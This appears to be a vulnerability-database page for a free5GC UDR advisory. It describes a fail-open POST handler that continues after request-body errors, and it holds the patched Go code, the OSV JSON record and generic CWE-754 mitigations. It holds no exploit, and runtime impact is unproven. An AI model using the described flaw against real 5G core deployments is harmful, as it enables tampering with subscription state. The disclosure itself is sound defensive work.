Because execution continues after body read or parsing failure, the processor may receive an uninitialized, partially initialized, or otherwise unintended PolicyDataSubscription object. [file:93]

The exact runtime impact depends on downstream processor behavior and storage validation. [file:93]
At minimum, this is a security-relevant robustness flaw that can lead to inconsistent request handling; under certain runtime conditions it may allow creation of invalid or unintended subscription state. [file:93]

Reproduction Status

The code path has been statically confirmed. [file:93] A complete runtime proof of unintended subscription creation after GetRawData() or deserialization failure has not yet been established. [file:93]

Patch

The handler should immediately terminate after sending an error response for body read or deserialization failure. [file:93]

A minimal fix is to add missing return statements in HandlePolicyDataSubsToNotifyPost:

reqBody, err := c.GetRawData()
if err != nil {
    logger.DataRepoLog.Errorf("Get Request Body error: %+v", err)
    pd := openapi.ProblemDetailsSystemFailure(err.Error())
    c.Set(sbi.IN_PB_DETAILS_CTX_STR, pd.Cause)
    c.JSON(http.StatusInternalServerError, pd)
    return
}

err = openapi.Deserialize(&policyDataSubscription, reqBody, "application/json")
if err != nil {
    logger.DataRepoLog.Errorf("Deserialize Request Body error: %+v", err)
    pd := util.ProblemDetailsMalformedReqSyntax(err.Error())
    c.Set(sbi.IN_PB_DETAILS_CTX_STR, pd.Cause)
    c.JSON(http.StatusBadRequest, pd)
    return
}

Additionally, the deserialization call should pass a pointer to the destination object so that the parsed body is written into the intended structure. [file:93]

Details

The issue is compounded by the handler's deserialization call, which passes policyDataSubscription directly to openapi.Deserialize(...) instead of passing a pointer to the destination object. This inconsistent usage further increases the risk that request processing continues with an empty, partially initialized, or otherwise unintended subscription object. [file:93]

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/udr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40343"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-21T19:05:18Z",
    "nvd_published_at": "2026-04-22T00:16:27Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA fail-open request handling flaw in the UDR service causes the `/nudr-dr/v2/policy-data/subs-to-notify` POST handler to continue processing requests even after request body retrieval or deserialization errors.\n\nThis may allow unintended creation of Policy Data notification subscriptions with invalid, empty, or partially processed input, depending on downstream processor behavior.\n\n### Details\nThe endpoint `POST /nudr-dr/v2/policy-data/subs-to-notify` is intended to create a Policy Data notification subscription only after the HTTP request body has been successfully read and parsed into a valid `PolicyDataSubscription` object. [file:93]\n\nIn the free5GC UDR implementation, the function `HandlePolicyDataSubsToNotifyPost` in `NFs/udr/internal/sbi/api_datarepository.go` does not terminate execution after input-processing failures. [file:93]\n\nThe request flow is:\n\n1. The handler calls `c.GetRawData()` to read the HTTP request body. [file:93]\n2. If `GetRawData()` fails, the handler sends an HTTP 500 error response, but **does not return**. [file:93]\n3. The handler then calls `openapi.Deserialize(policyDataSubscription, reqBody, \"application/json\")`. [file:93]\n4. If deserialization fails, the handler sends an HTTP 400 error response, but again **does not return**. [file:93]\n5. Execution continues and the handler still invokes `s.Processor().PolicyDataSubsToNotifyPostProcedure(c,policyDataSubscription)`. [file:93]\n\nAs a result, the endpoint operates in a fail-open manner: request processing may continue after fatal input validation or body handling errors, instead of being safely aborted. [file:93]\n\nThis differs from safer handlers in the same file, which use a helper pattern that explicitly returns on body read or deserialization failure before calling the corresponding processor routine. [file:93]\n\n### Security Impact\nThis issue affects a write-capable API that creates Policy Data notification subscriptions. [file:93]  \nBecause execution continues after body read or parsing failure, the processor may receive an uninitialized, partially initialized, or otherwise unintended `PolicyDataSubscription` object. [file:93]\n\nThe exact runtime impact depends on downstream processor behavior and storage validation. [file:93]  \nAt minimum, this is a security-relevant robustness flaw that can lead to inconsistent request handling; under certain runtime conditions it may allow creation of invalid or unintended subscription state. [file:93]\n\n### Reproduction Status\nThe code path has been statically confirmed. [file:93]  A complete runtime proof of unintended subscription creation after `GetRawData()` or deserialization failure has not yet been established. [file:93]\n\n### Patch\nThe handler should immediately terminate after sending an error response for body read or deserialization failure. [file:93]\n\nA minimal fix is to add missing `return` statements in `HandlePolicyDataSubsToNotifyPost`:\n\n```go\nreqBody, err := c.GetRawData()\nif err != nil {\n    logger.DataRepoLog.Errorf(\"Get Request Body error: %+v\", err)\n    pd := openapi.ProblemDetailsSystemFailure(err.Error())\n    c.Set(sbi.IN_PB_DETAILS_CTX_STR, pd.Cause)\n    c.JSON(http.StatusInternalServerError, pd)\n    return\n}\n\nerr = openapi.Deserialize(\u0026policyDataSubscription, reqBody, \"application/json\")\nif err != nil {\n    logger.DataRepoLog.Errorf(\"Deserialize Request Body error: %+v\", err)\n    pd := util.ProblemDetailsMalformedReqSyntax(err.Error())\n    c.Set(sbi.IN_PB_DETAILS_CTX_STR, pd.Cause)\n    c.JSON(http.StatusBadRequest, pd)\n    return\n}\n```\nAdditionally, the deserialization call should pass a pointer to the destination\nobject so that the parsed body is written into the intended structure. [file:93]\n\n###Details\nThe issue is compounded by the handler\u0027s deserialization call, which passes\n`policyDataSubscription` directly to `openapi.Deserialize(...)` instead of\npassing a pointer to the destination object. This inconsistent usage further\nincreases the risk that request processing continues with an empty, partially\ninitialized, or otherwise unintended subscription object. [file:93]",
  "id": "GHSA-jwch-w7wh-gqjm",
  "modified": "2026-04-24T21:11:11Z",
  "published": "2026-04-21T19:05:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-jwch-w7wh-gqjm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40343"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "free5GC UDR: Fail-open handling in PolicyDataSubsToNotifyPost allows unintended subscription creation"
}

Mitigation MIT-3
Requirements

Strategy: Language Selection

  • Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248).
Mitigation
Implementation

Check the results of all functions that return a value and verify that the value is expected.

Mitigation
Implementation

If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).

Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
  • Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-38
Architecture and Design Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Mitigation
Architecture and Design

Use system limits, which should help to prevent resource exhaustion. However, the product should still handle low resource conditions since they may still occur.

No CAPEC attack patterns related to this CWE.